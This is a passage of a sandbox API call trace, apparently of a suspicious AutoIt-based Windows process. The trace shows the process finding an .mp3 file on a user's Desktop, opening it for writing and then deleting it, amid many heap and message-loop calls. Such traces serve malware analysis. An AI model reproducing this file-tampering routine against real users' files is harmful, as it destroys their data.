0x8 [0030.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x7e0c1db0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0x7c2100 [0030.163] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.163] CharLowerBuffW (in: lpsz="byte[40363]", cchLength=0xb | out: lpsz="byte[40363]") returned 0xb [0030.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.164] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.164] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.164] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.164] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.164] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.164] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.165] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxptuwejz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.165] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.165] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.166] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.166] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.166] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.166] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.166] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.166] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFilePart=0x0) returned 0x33 [0030.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x11dde1e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0x7c2100 [0030.167] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxptuwejz.mp3")) returned 1 [0030.168] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x11dde1e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0 [0030.168] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.168] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.170] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.170] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.172] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.172] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 